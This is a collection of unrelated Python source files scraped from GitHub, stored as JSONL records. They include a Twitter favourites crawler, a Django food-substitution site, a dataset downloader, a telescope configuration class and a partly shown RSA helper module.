\"http://twitter.com/favorites/%s.rss\"\n\ndef debug(msg):\n pass\n# logging.getLogger().debug(msg)\n\nclass Counter(db.Model):\n \"\"\"Counter\n \"\"\"\n name = db.StringProperty(verbose_name=\"counter name\",\n default=\"favotter\")\n count = db.IntegerProperty(verbose_name=\"counter\",\n default=0)\n updated = db.DateTimeProperty(verbose_name=\"The time this row is updated\",\n auto_now=True)\n created = db.DateTimeProperty(verbose_name=\"The time this row is created\",\n auto_now_add=True)\n\ndef add_tuser_counter(num):\n counters_query = db.GqlQuery(\"SELECT * FROM Counter WHERE name = :1 LIMIT 1\",\n \"tuser\")\n if counters_query.count() > 0:\n counter = counters_query[0]\n else:\n debug(\"created new counter\")\n counter = Counter()\n counter.count = counter.count + num\n counter.put()\n\ndef get_tuser_count():\n counters_query = db.GqlQuery(\"SELECT * FROM TuserCount LIMIT 1\")\n if counters_query.count() > 0:\n counter = counters_query[0]\n else:\n debug(\"created new counter\")\n counter = Counter()\n return counter.count\n\ndef add_tweet_count(num):\n counters_query = db.GqlQuery(\"SELECT * FROM Counter WHERE name = :1 LIMIT 1\",\n \"tweet\")\n if counters_query.count() > 0:\n counter = counters_query[0]\n else:\n debug(\"created new counter\")\n counter = Counter(name=\"tweet\")\n counter.count = counter.count + num\n counter.put()\n\ndef add_fav_count(num):\n counters_query = db.GqlQuery(\"SELECT * FROM Counter WHERE name = :1 LIMIT 1\",\n \"fav\")\n if counters_query.count() > 0:\n counter = counters_query[0]\n else:\n debug(\"created new counter\")\n counter = Counter(name=\"fav\")\n counter.count = counter.count + num\n counter.put()\n\nclass 
Fav(db.Model):\n \"\"\"A favorite\"\"\"\n tweet_url = db.StringProperty(verbose_name=\"tweet url (expressed in string)\",\n required=True)\n user_name = db.StringProperty(verbose_name=\"user name (expressed in string)\",\n required=True)\n\n updated = db.DateTimeProperty(verbose_name=\"The time this favorite is updated\",\n auto_now=True)\n created = db.DateTimeProperty(verbose_name=\"The time this favorite is created\",\n auto_now_add=True)\n\nclass Tuser(db.Model):\n \"\"\"A user who want to crawl\"\"\"\n uid = db.StringProperty(verbose_name=\"user id (expressed in string)\"\n )\n name = db.StringProperty(verbose_name=\"The user's twitter account\",\n required=True)\n profile_image = db.LinkProperty(verbose_name=\"Link to the icon image\",\n required=True)\n\n priority = db.IntegerProperty(verbose_name=\"The priority of the user\",\n default=1,\n required=True)\n last_crawl = db.DateTimeProperty(verbose_name=\"The last time the user crawled\",\n required=True)\n updated = db.DateTimeProperty(verbose_name=\"The time this user is updated\",\n auto_now=True)\n created = db.DateTimeProperty(verbose_name=\"The time this user is created\",\n auto_now_add=True)\n\n def putfav(self):\n fav_feed_url = TWITTER_FAV_URL_FORMAT % self.name\n favorites = feedparser.parse(fav_feed_url)\n debug(\"putfav %d\" % len(favorites.entries))\n fav_count = 0\n for favorite in favorites.entries:\n debug(favorite.title)\n fav_time = datetime(*(favorite.updated_parsed[:6]))\n # Pass old favorite\n if fav_time < self.last_crawl:\n continue\n tweet = Tweet(url=favorite.id,\n text=favorite.title,\n html_text=favorite.title)\n fav = Fav(tweet_url=favorite.id,\n user_name=self.name)\n tweet.put()\n fav.put()\n fav_count = fav_count + 1\n self.last_crawl = datetime.now()\n self.put()\n return fav_count\n\nclass Tweet(db.Model):\n \"\"\"A tweet\"\"\"\n url = db.StringProperty(verbose_name=\"tweet url (expressed in string)\",\n required=True)\n text = db.TextProperty(verbose_name=\"The tweet\",\n required=True)\n html_text = db.TextProperty(verbose_name=\"The tweet as html\")\n created = db.DateTimeProperty(verbose_name=\"The time this tweet is created\",\n auto_now_add=True)\n\nclass CrawlStatus(db.Model):\n favotter_crawl = db.DateTimeProperty(verbose_name=\"favotter crawled\",\n auto_now=True)\n tsearch_crawl = db.DateTimeProperty(verbose_name=\"twitter search crawled\",\n auto_now=True)\n\n\ndef recentTuser():\n users = db.GqlQuery(\n \"SELECT * FROM Tuser ORDER BY created DESC LIMIT 1\"\n )\n for user in users:\n return user\n return None\n# return users[0] if users else None\n\ndef delete50users():\n q = db.GqlQuery(\"SELECT * FROM Tuser\")\n results = q.fetch(1000)\n db.delete(results)\n\ndef countusers():\n q = db.GqlQuery(\"SELECT * FROM Tuser\")\n return q.count()\n\ndef users_dict_by_names(names):\n users = db.GqlQuery(\"SELECT * FROM Tuser WHERE name IN :1\", names)\n dic = {}\n for user in users:\n dic[user.name] = user\n return dic\n\ndef users_to_fav():\n users = db.GqlQuery(\"SELECT * FROM Tuser ORDER BY last_crawl ASC LIMIT 2\")\n return users\n","repo_name":"suztomo/favotter","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5963,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"31499595248","text":"import sys\n\ndef compare_insert(longer, shorter, shorter_len):\n differ = False\n shift = 0\n for i in range(shorter_len):\n if longer[i + shift] != shorter[shift]:\n if not differ:\n differ = True\n shift = 1\n 
else:\n return False\n return True\n\n\ndef compare_change(f, s, l):\n differ = False\n for i in range(l):\n if f[i] != s[i]:\n if not differ:\n differ = True\n else:\n return False\n return True\n\n\ndef check_strings(s_1, s_2, len_1, len_2):\n if abs(len_1 - len_2) > 1:\n return False\n elif len_1 == len_2 + 1:\n return compare_insert(s_1, s_2, len_2)\n elif len_2 == len_1 + 1:\n return compare_insert(s_2, s_1, len_1)\n else:\n return compare_change(s_1, s_2, len_1)\n\n\ns_1 = list(sys.stdin.readline())\ns_2 = list(sys.stdin.readline())\nlen_1 = len(s_1)\nlen_2 = len(s_2)\nprint(check_strings(s_1, s_2, len_1, len_2))\n\n","repo_name":"Mitan/interview-book","sub_path":"ch_1/1_5.py","file_name":"1_5.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73965734634","text":"from cartblanche.app import db\nfrom cartblanche.helpers.validation import base62, get_basic_tranche, get_compound_details, get_new_tranche\nfrom sqlalchemy.ext.hybrid import hybrid_property, hybrid_method\nfrom sqlalchemy import func\nfrom sqlalchemy.orm import load_only\nimport random\nimport sqlalchemy as sa\nfrom cartblanche.data.models.tin.tranches_mapping import Tranches\nfrom cartblanche.data.models.tin.catalog import CatalogSubstanceModel\n\nTABLE_ROW_COUNT_SQL = \\\n \"\"\" SELECT CAST(reltuples AS BIGINT) AS num_rows\n FROM pg_catalog.pg_class\n WHERE oid = CAST(:table AS pg_catalog.regclass)\n \"\"\"\n\n\nclass SubstanceModel(db.Model):\n #__bind_key__ = 'tin'\n __tablename__ = 'substance'\n\n sub_id = db.Column(db.BigInteger, primary_key=True, nullable=False,\n doc=\"A numeric (integer) representation of ZINC ID\")\n smiles = db.Column(db.String(), \n unique=True, nullable=False,\n doc=\"A query-enabled molecular structure (use the contains and match operators)\")\n inchikey = db.Column('inchikey', db.CHAR(27), unique=True, nullable=False,\n doc=\"The Substance's InChI key\")\n purchasable = db.Column('purchasable', db.Integer, default=-1, nullable=True,\n server_default='0',\n doc=\"A numeric representation of the commercial availability of this compound \"\n \"(high is better)\")\n date_updated = db.Column(db.Date, nullable=True)\n\n catalog_contents = db.relationship(\"CatalogContentModel\",\n secondary=\"catalog_substance\",\n backref=\"substances\",\n lazy='joined')\n tranche_id = db.Column('tranche_id', db.Integer)\n\n @classmethod\n def get_random(cls, limit):\n return cls.query.options(load_only('sub_id')).offset(\n func.floor(\n func.random() *\n db.session.query(func.count(cls.sub_id))\n )\n ).limit(limit).all()\n\n @classmethod\n def get_random2(cls, limit):\n rowcount_query = sa.text(TABLE_ROW_COUNT_SQL)\n count = db.session.connection().execute(rowcount_query, table='substance').scalar()\n print(\"Row Count: ===========================================\", count)\n offset = abs(int(count * random.random())-int(limit))\n return cls.query.offset(offset).limit(limit)\n\n @classmethod\n def get_random3(cls, limit):\n offset = func.floor(func.random() * 100)\n return cls.query.offset(offset).limit(limit)\n\n @classmethod\n def find_by_sub_id(cls, sub_id):\n return cls.query.filter_by(sub_id=sub_id).first()\n\n @hybrid_property\n def zinc_id(self):\n if self.tranche:\n return \"ZINC{}{}{}\".format(self.tranche['mwt'], self.tranche['logp'], base62(self.sub_id).zfill(10))\n return \"Unknown\"\n\n @hybrid_property\n def tranche(self):\n if self.tranche_id:\n tranchee = 
Tranches.query.filter_by(tranche_id=self.tranche_id).first()\n return get_new_tranche(tranchee.tranche_name)\n return get_basic_tranche(self.smiles)\n\n def json_ids(self):\n return {\n 'zinc_id': self.zinc_id,\n 'smiles': self.smiles\n }\n\n def json(self):\n return {\n 'tranche': self.tranche,\n 'zinc_id': self.zinc_id,\n 'sub_id': self.sub_id,\n 'smiles': self.smiles,\n 'supplier_code': [c.supplier_code for c in self.catalog_contents],\n 'catalogs': [c.catalog.json() for c in self.catalog_contents],\n 'tranche_details': get_compound_details(self.smiles),\n 'tranche_id': self.tranche_id\n }\n\n def json2(self):\n return {\n 'tranche': self.tranche,\n 'zinc_id': self.zinc_id,\n 'sub_id': self.sub_id,\n 'smiles': self.smiles\n }\n\n def json_all(self, tin_url):\n res = {\n 'sub_id': self.sub_id,\n 'zinc_id': self.zinc_id,\n 'smiles': self.smiles,\n 'inchikey': str(self.inchikey).strip(),\n 'purchasable': self.purchasable,\n 'supplier_code': [c.supplier_code for c in self.catalog_contents],\n 'catalogs': [c.catalog.json() for c in self.catalog_contents],\n 'server': tin_url\n # 'logp': self.logp\n }\n\n return {**res, **self.tranche}\n\n","repo_name":"docking-org/cartblanche22","sub_path":"backend/cartblanche/data/models/tin/substance.py","file_name":"substance.py","file_ext":"py","file_size_in_byte":4503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28737965930","text":"import urllib.request\nfrom gzip import GzipFile\nfrom pathlib import Path\nfrom tempfile import NamedTemporaryFile\nfrom zipfile import ZIP_DEFLATED, ZipFile\n\nimport pandas as pd\n\nfrom .downloader import BaseDownloader\n\n\nclass AmazonMusicDataManager(BaseDownloader):\n DEFAULT_PATH = Path(\"~/.amazon-music.zip\").expanduser()\n\n def _save_to_zippath(self, path: Path) -> None:\n ratings_url = \"http://snap.stanford.edu/data/amazon/productGraph/categoryFiles/ratings_Digital_Music.csv\"\n meta_url = \"http://snap.stanford.edu/data/amazon/productGraph/categoryFiles/meta_Digital_Music.json.gz\"\n with ZipFile(path, \"w\", compression=ZIP_DEFLATED) as zf:\n print(\"download rating...\")\n with NamedTemporaryFile(\"w\") as rating_temp:\n urllib.request.urlretrieve(ratings_url, rating_temp.name)\n rating_temp.seek(0)\n zf.write(rating_temp.name, \"amazon-music/ratings.csv\")\n\n print(\"download item meta data...\")\n with NamedTemporaryFile(\"w\") as meta_temp:\n urllib.request.urlretrieve(meta_url, meta_temp.name)\n meta_temp.seek(0)\n with GzipFile(meta_temp.name, \"rb\") as ifs:\n zf.writestr(\"amazon-music/music-meta.json\", ifs.read())\n\n def read_interaction(self) -> pd.DataFrame:\n return pd.read_csv(\n self._read_as_istream(\"amazon-music/ratings.csv\"),\n header=None,\n names=[\"user_id\", \"music_id\", \"rating\", \"timestamp\"],\n )\n\n def read_metadata(self) -> pd.DataFrame:\n results = []\n for l in self._read_as_istream(\"amazon-music/music-meta.json\"):\n meta = eval(l.decode(\"utf-8\"))\n results.append(\n (\n meta[\"asin\"],\n meta.pop(\"title\", None),\n meta.pop(\"price\", None),\n meta.pop(\"categories\", [None])[0],\n )\n )\n return pd.DataFrame(\n results, columns=[\"music_id\", \"title\", \"price\", \"categories\"]\n ).set_index(\"music_id\")\n","repo_name":"tohtsky/irspack","sub_path":"src/irspack/dataset/amazon_music.py","file_name":"amazon_music.py","file_ext":"py","file_size_in_byte":2104,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"72"} +{"seq_id":"17043675220","text":"\r\nimport 
random\r\n\r\nprint(\"I’m thinking of a number in the range 0-50. You have five tries to guess it.\")\r\nrandomNumber = random.randrange(0,50)\r\nguess = False\r\nguessNumber = 0\r\n\r\n\r\nwhile guess == False:\r\n userGuess = int(input(\"Guess {}: \".format(guessNumber)))\r\n if guessNumber == 5:\r\n print (\"Game over! The correct answer was {}.\".format(randomNumber))\r\n break\r\n if userGuess == randomNumber:\r\n guess = True\r\n print(\"You are right! I was thinking of {}!\".format(randomNumber))\r\n elif userGuess > randomNumber:\r\n print(\"{} is too high.\".format(userGuess))\r\n guessNumber += 1\r\n elif userGuess < randomNumber:\r\n print(\"{} is too low.\".format(userGuess))\r\n guessNumber += 1\r\n \r\n","repo_name":"jibraelp/python-practice","sub_path":"pythonGuessingGame.py","file_name":"pythonGuessingGame.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4216504188","text":"from django.core.management.commands import ( # type: ignore[attr-defined]\n makemigrations,\n)\n\nfrom psqlextra.backend.migrations import postgres_patched_migrations\n\n\nclass Command(makemigrations.Command):\n help = \"Creates new PostgreSQL specific migration(s) for apps.\"\n\n def handle(self, *app_labels, **options):\n with postgres_patched_migrations():\n return super().handle(*app_labels, **options)\n","repo_name":"SectorLabs/django-postgres-extra","sub_path":"psqlextra/management/commands/pgmakemigrations.py","file_name":"pgmakemigrations.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":647,"dataset":"github-code","pt":"72"} +{"seq_id":"33732647637","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport sys\nimport argparse\nfrom . 
import Pitman, PODCASTS\n\n\ndef stype(bytestring):\n unicode_string = bytestring.decode(sys.getfilesystemencoding())\n return unicode_string\n\n\ndef parse_options():\n parser = argparse.ArgumentParser(description='Dig for your favored '\n 'Podcast.')\n parser.add_argument('-p', '--podcast', type=stype,\n choices=PODCASTS.keys(), default='CLR')\n subparsers = parser.add_subparsers()\n\n parser_show = subparsers.add_parser('show')\n parser_show.set_defaults(show=True)\n parser_show.add_argument('-l', '--limit', type=int, default=0,\n help='limit show to last N episodes')\n parser_show.add_argument('-v', '--verbose', action=\"store_true\",\n help='verbose output')\n\n parser_search = subparsers.add_parser('search')\n parser_search.set_defaults(search=True)\n parser_search.add_argument('artist', type=stype, nargs='+',\n help='search for artist')\n\n parser_get = subparsers.add_parser('get')\n parser_get.set_defaults(get=True)\n parser_get.add_argument('episode', type=int, nargs='+',\n help='download episode')\n\n return parser.parse_args()\n\n\ndef run(args):\n pitman = Pitman(args.podcast)\n pitman.parse(args.podcast)\n if hasattr(args, 'show'):\n pitman.show(args.limit, args.verbose)\n elif hasattr(args, 'search'):\n pitman.search(args.artist)\n elif hasattr(args, 'get'):\n pitman.get(args.episode)\n\n\ndef main():\n args = parse_options()\n run(args)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"tschaefer/pitman","sub_path":"pitman/pitman.py","file_name":"pitman.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21974719413","text":"#!/bin/python3\n#https://www.hackerrank.com/challenges/hackerland-radio-transmitters\n\nimport sys\n\n\nn,k = input().strip().split(' ')\nn,k = [int(n),int(k)]\nx = sorted([int(x_temp) for x_temp in input().strip().split(' ')])\n\nno_of_transmitters = 0\ni = 0 #index\npointer = 0\n\nwhile i x[i] + k:\n# pointer = j-1 +\n# transmitter += 1 # transmitter at x[j-1]\n","repo_name":"pyaf/hackerrank","sub_path":"algorithm/challenges/hackerland-radio-transmitters.py","file_name":"hackerland-radio-transmitters.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20830156696","text":"'''\nAuthor: Kamran Akram \nDate: 12/11/18\n'''\nimport json\nimport spacy\n\n\nclass UrduGenderAnalyzer:\n\n @staticmethod\n def parse_tagged_sentence(s):\n tws = []\n isP = True\n isW = False\n p = w = \"\"\n for c in s:\n if c is '|':\n isP = not isP\n isW = not isW\n elif c is \" \":\n isW = not isW\n isP = not isP\n tw = {'p': p,'w': w}\n tws.append(tw)\n p = w = \"\"\n else:\n if isP:\n p += c\n elif isW:\n w += c\n return tws\n\n @staticmethod\n def analyze_gender(s):\n spc = spacy.load('en_core_web_sm')\n doc = spc(s)\n sub = None\n for token in doc:\n if token.dep_ == \"nsubj\":\n sub = token.lower_\n break\n if sub is None:\n print(\"Unable to find subject in sentence.\")\n return None\n with open('names-dataset.json', encoding='utf-8') as f:\n d = json.load(f)\n g = None\n for ns in d:\n if sub == ns.get('name').lower():\n g = ns.get('gender')\n return g\n print(\"Subject is not in dataset.\")\n return None\n\n\n\n\n","repo_name":"kamii1000/urdu-trans-nlp","sub_path":"UrduGenderAnalyzer/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} 
+{"seq_id":"7701875501","text":"from django.http import HttpResponse\nfrom django.template.loader import get_template\nfrom django.template import Context\nfrom tagging.models import TaggedItem\nfrom django.views.decorators.csrf import csrf_exempt\nfrom models import *\nimport itertools\nimport json\n\n# Create your views here.\ndef index (request):\n\tt = get_template('index.html')\n\thtml = t.render(Context({}))\n\treturn HttpResponse(html)\n\ndef learn (request):\n\tt = get_template('learn.html')\n\thtml = t.render(Context({}))\n\treturn HttpResponse(html)\n\ndef ingredient (request, id_num):\n\tt = get_template('ingredient.html')\n\tingredient_object = Ingredient.objects.get(id=id_num)\n\n\tsub = [sub.dishes.all() for sub in ingredient_object.substitutee.all()]\n\tdishes = list(itertools.chain.from_iterable(sub))\n\tdishes = dishes + list(ingredient_object.dishes.all())\n\tdishes = sorted(list(set(dishes))) # remove duplices\n\n\tc = Context({'ingred':ingredient_object,'dishes':dishes})\n\thtml = t.render(c)\n\treturn HttpResponse(html)\n\ndef dish (request, id_num):\n\tt = get_template('dish.html')\n\tdish_object = Dish.objects.get(id=id_num)\n\n\tingredients = dish_object.ingredients.all()\n\tsubstitutes = [list(ingred.substitutes.all()) for ingred in ingredients]\n\tsubstitutes = list(itertools.chain.from_iterable(substitutes))\n\tsubstitutes = sorted(list(set(substitutes)))\n\n\tc = Context({'dish':dish_object, 'subs':substitutes, 'ingredients':ingredients})\n\thtml = t.render(c)\n\treturn HttpResponse(html)\n\n@csrf_exempt\ndef subset (request):\n\t\"\"\"\n\tIncludes all dishes if 'dishAll' True, else union of 'dishFilters' string. Same for ingredients.\n\t\"\"\"\n\n\tdata = json.loads(request.body)\n\n\tREQUIRED_FIELDS = ['dishAll','ingredientAll','dishFilters','ingredientFilters']\n\n\tif sum([1 if e in data else 0 for e in REQUIRED_FIELDS]) != len(REQUIRED_FIELDS) or \\\n\t\trequest.method != 'POST':\n\t\treturn HttpResponse(status=400)\n\n\titems = list()\n\n\tif data['dishAll'] == True:\n\t\titems.extend(list(Dish.objects.all()))\n\telse:\n\t\titems.extend(list(TaggedItem.objects.get_union_by_model(Dish, data['dishFilters'])))\n\n\tif data['ingredientAll'] == True:\n\t\titems.extend(list(Ingredient.objects.all()))\n\telse:\n\t\titems.extend(list(TaggedItem.objects.get_union_by_model(Ingredient, data['ingredientFilters'])))\n\n\t# identifier, name, image, vt, vg, classes, section\n\tresponse = []\n\n\tfor item in items:\n\t\t# identifier\n\t\tif type(item) == Dish:\n\t\t\tidentifier = 'D'\n\t\telif type(item) == Ingredient:\n\t\t\tidentifier = 'I'\n\t\tidentifier += str(item.id)\n\n\t\tresponse.append({\n\t\t\t\"identifier\" : identifier,\n\t\t\t\"name\" : item.name,\n\t\t\t\"image\" : item.image,\n\t\t\t\"vt\" : item.isVegetarian,\n\t\t\t\"vg\" : item.isVegan,\n\t\t\t\"classes\" : [],\n\t\t\t})\n\n\treturn HttpResponse(json.dumps(response), content_type=\"application/json\", status=200)\n\n@csrf_exempt\ndef list_all (request):\n\t\"\"\"\n\tReturns a mapping of all items and their identifiers.\n\t\"\"\"\n\n\tif request.method != 'GET':\n\t\treturn HttpResponse(status=400)\n\n\tresponse = {}\n\n\tfor dish in Dish.objects.all():\n\t\tresponse[dish.name] = 'D' + str(dish.id)\n\n\tfor ingredient in Ingredient.objects.all():\n\t\tresponse[ingredient.name] = 'I' + str(ingredient.id)\n\n\treturn HttpResponse(json.dumps(response), content_type=\"application/json\", 
status=200)\n","repo_name":"aboolean/vSafe","sub_path":"website/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32159140294","text":"from itertools import combinations\r\na=[]\r\nL,C=map(int, input().split())\r\npwd=sorted(list(input().split()))\r\npos=combinations(pwd, L)\r\nm=['a', 'e', 'i', 'o', 'u']\r\nfor i in pos:\r\n mo=0\r\n ja=0\r\n for j in range(len(i)):\r\n if i[j] in m:\r\n mo += 1\r\n else:\r\n ja += 1\r\n if mo >= 1 and ja >= 2:\r\n print(''.join(i))","repo_name":"wnsgml7267/cote-practice","sub_path":"백준/Gold/1759. 암호 만들기/암호 만들기.py","file_name":"암호 만들기.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32063239022","text":"from os import path\nfrom astropy.coordinates import EarthLocation\nimport yaml\nimport numpy as np\nfrom prose import CONFIG\nimport astropy.units as u\n\n\ndef str_to_astropy_unit(unit_string):\n return u.__dict__[unit_string]\n\n\nclass Telescope:\n \"\"\"Object containing telescope information.\n\n see :ref:`telescope-config` page for more info\n\n Parameters\n ----------\n telescope_file : dict or str, optional\n telescope dict or description file, by default None which load a \"default\" telescope\n\n \"\"\"\n def __init__(self, telescope_file=None):\n\n # Keywords\n self.keyword_object = \"OBJECT\"\n self.keyword_image_type = \"IMAGETYP\"\n self.keyword_light_images = \"light\"\n self.keyword_dark_images = \"dark\"\n self.keyword_flat_images = \"flat\"\n self.keyword_bias_images = \"bias\"\n self.keyword_observation_date = \"DATE-OBS\"\n self.keyword_exposure_time = \"EXPTIME\"\n self.keyword_filter = \"FILTER\"\n self.keyword_observatory = \"TELESCOP\"\n self.keyword_airmass = \"AIRMASS\"\n self.keyword_fwhm = \"FWHM\"\n self.keyword_seeing = \"SEEING\"\n self.keyword_ra = \"RA\"\n self.keyword_dec = \"DEC\"\n self.ra_unit = \"deg\"\n self.dec_unit = \"deg\"\n self.keyword_julian_date = \"JD\"\n self.keyword_flip = \"PIERSIDE\"\n\n # Specs\n self.name = \"Unknown\"\n self.trimming = (0, 0)\n self.read_noise = 9\n self.gain = 1\n self.altitude = 2000\n self.diameter = 100\n self.pixel_scale = None\n self.latlong = [None, None]\n\n if telescope_file is not None:\n success = self.load(telescope_file)\n if success:\n CONFIG.save_telescope_file(telescope_file)\n\n def __getattribute__(self, name):\n if name == \"ra_unit\":\n return str_to_astropy_unit(self.__dict__[name])\n elif name == \"dec_unit\":\n return str_to_astropy_unit(self.__dict__[name])\n return super(Telescope, self).__getattribute__(name)\n\n def load(self, file):\n if isinstance(file, str) and path.exists(file):\n with open(file, \"r\") as f:\n telescope = yaml.load(f)\n elif isinstance(file, dict):\n telescope = file\n elif file is None:\n return False\n else:\n raise ValueError(\"file must be path or dict\")\n \n self.__dict__.update(telescope)\n\n if telescope is None:\n return False\n else:\n return True\n \n def is_new(self):\n return not self.name.lower() in CONFIG.telescopes_dict()\n\n @property\n def earth_location(self):\n return EarthLocation(*self.latlong, self.altitude)\n\n def error(self, signal, area, sky, exposure, airmass=None, scinfac=0.09):\n _signal = signal.copy() \n _squarred_error = _signal + area * (self.read_noise ** 2 + (self.gain / 2) ** 2 + sky)\n\n if airmass is not None:\n scintillation = (\n scinfac\n * 
np.power(self.diameter, -0.6666)\n * np.power(airmass, 1.75)\n * np.exp(-self.altitude / 8000.0)\n ) / np.sqrt(2 * exposure)\n\n _squarred_error += np.power(signal * scintillation, 2)\n\n return np.sqrt(_squarred_error)\n","repo_name":"franpoz/prose","sub_path":"prose/telescope.py","file_name":"telescope.py","file_ext":"py","file_size_in_byte":3320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"35029709059","text":"from flask import Flask,request,render_template\nimport numpy as np\nimport ast\nimport pickle\napp = Flask(__name__)\n\n# initial route\n@app.route('/')\ndef home():\n return render_template('0.html')\n\n\n@app.route('/result', methods=['GET', 'POST'])\ndef hasil():\n if request.method == 'POST':\n data = request.form\n Radius = float(data['Radius Mean'])\n Texture = float(data['Texture Mean'])\n Perimeter = float(data['Perimeter Mean'])\n Area = float(data['Area Mean'])\n Smoothness = float(data['Smoothness Mean'])\n Compactness = float(data['Compactness Mean'])\n Concavity = float(data['Concavity Mean'])\n Concave = float(data['Concave Points Mean'])\n Symmetri = float(data['Symmetry Mean'])\n\n data_new = [Radius,Texture,Perimeter,Area,Smoothness,Compactness,Concavity,Concave,Symmetri]\n\n data_new = np.array(data_new)\n\n data1 = scaler.transform([data_new])\n\n # print(data1)\n # print(data_new)\n # return 'ok'\n\n\n x = model.predict(data1)[0]\n\n # print(data_new)\n return render_template('1.html',x=x)\n # 'Prediksi = ' + str(x)\n\n\nif __name__ == '__main__':\n model = pickle.load(open(\"MachineModel\", 'rb'))\n scaler = pickle.load(open(\"scal\", 'rb'))\n app.run(debug=True, port=1234)\n","repo_name":"fadelasyahid/Deploy_Machine_Learning_dengan_Flask","sub_path":"file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"26902850711","text":"import openpyxl\nimport os\nfrom pathlib import Path\nimport glob\n\nsourceDir = 'sources'\n\nprint(f'finding xlsx files in {sourceDir}')\n\n# get all excel files in sources\nxlFiles = glob.glob(f'{sourceDir}/**/*.xlsx', recursive=True)\n\ndef xlsx2csv(xlFile):\n # convert to csv with parent dir\n xlFile = Path(xlFile)\n\n # get data from excel file\n xlsx = openpyxl.load_workbook(xlFile, data_only=True)\n sheet = xlsx.active\n data = sheet.rows\n\n # create/open dir and create csv\n outDir = Path.cwd() / xlFile.parts[-2].split(' ')[0] # strip the tibetan with split\n outDir.mkdir(parents=True, exist_ok=True)\n outStem = xlFile.stem\n outPath = outDir / f'{outStem}.csv'\n\n # write data in csv\n csv = open(outPath, \"w+\", encoding='utf-8')\n for row in data:\n l = list(row)\n for i in range(len(l)):\n if i == len(l) - 1:\n csv.write(str(l[i].value))\n else:\n csv.write(str(l[i].value) + ',')\n csv.write('\\n')\n csv.close()\n\n\nfor xl in xlFiles:\n print(f'converting: {xl}')\n xlsx2csv(xl)\n","repo_name":"Esukhia/tengyur-pagination","sub_path":"xlsx2csv.py","file_name":"xlsx2csv.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28044529565","text":"from datetime import datetime, timedelta\n\nfrom django.utils.translation import ugettext as _\nfrom django.contrib.auth.models import AnonymousUser\nfrom knox.models import AuthToken\n\nfrom v1.api.appview import AppApiView\nfrom v1.core.exceptions import ServerError\nfrom v1.core.validators import 
DevicePushToken, AppLang  # AppLang assumed to live in validators as well\nfrom v1.core.reqsponse import Reqsponse\nfrom v1.user.models import User\n\nfrom ..models import TokenExtended\n\n\nclass TokenCurrent(AppApiView):\n\n    def patch(self, request, format=None):\n        \"\"\"\n        Update the current token's data.\n        \"\"\"\n        param_titles = {\n            'push_token': _(u'Push notification token'),\n            'lang': _(u'Language'),\n        }\n        req = Reqsponse(request, param_titles)\n\n        # Fetch and validate the data\n\n        push_token = req.get_str('push_token', DevicePushToken)\n        lang = req.get_str('lang', AppLang)\n\n        # Processing\n\n        token = request.auth\n        if token is None:\n            raise ServerError(msgDev='Unable to get the token from the system')\n\n        if lang:\n            token.ex.lang = lang\n\n        user = request.user\n        if user is not None and not user.is_guest:\n            if push_token:\n                token.ex.push_token = push_token\n\n        token.ex.save()\n\n        return req.output({})\n\n    def delete(self, request, format=None):\n        \"\"\"\n        Delete the current token.\n        \"\"\"\n        req = Reqsponse(request)\n\n        token = request.auth\n        if token is None:\n            raise ServerError(msgDev='Unable to get the token from the system')\n\n        token.delete()\n\n        return req.output({})\n","repo_name":"MasterYuri/Python-Django-Example","sub_path":"modules/session/views/token_current.py","file_name":"token_current.py","file_ext":"py","file_size_in_byte":1788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"7615359533","text":"# coding:utf-8\n\nfrom Crypto import Signature\nfrom Crypto.Cipher import PKCS1_v1_5 as PKCS1_v1_5_Cipher\nfrom Crypto.Hash import SHA, MD5, SHA256\nfrom Crypto.PublicKey import RSA\nfrom Crypto.Signature import PKCS1_v1_5\nfrom Crypto.Util import number\nfrom Crypto.Util._number_new import ceil_div\nfrom xml.dom.minidom import parseString\nimport M2Crypto\nimport Crypto\nimport base64\nimport binascii\nimport os\nimport re\n\nprivate_key_tpl = '''-----BEGIN PRIVATE KEY-----\n%s\n-----END PRIVATE KEY-----\n'''\n\npublic_key_tpl = '''-----BEGIN PUBLIC KEY-----\n%s\n-----END PUBLIC KEY-----'''\n\n\ndef ensure_utf8(s):\n    if isinstance(s, str):\n        return s.encode('utf8')\n    return s\n\n\ndef decode_base64(data):\n    \"\"\"Decode base64, padding being optional.\n\n    :param data: Base64 data as an ASCII byte string\n    :returns: The decoded byte string.\n\n    \"\"\"\n    missing_padding = 4 - len(data) % 4\n    if missing_padding:\n        data += b'=' * missing_padding\n    return base64.decodestring(data)\n\n\ndef base64ToString(s):\n    return decode_base64(s)\n    return 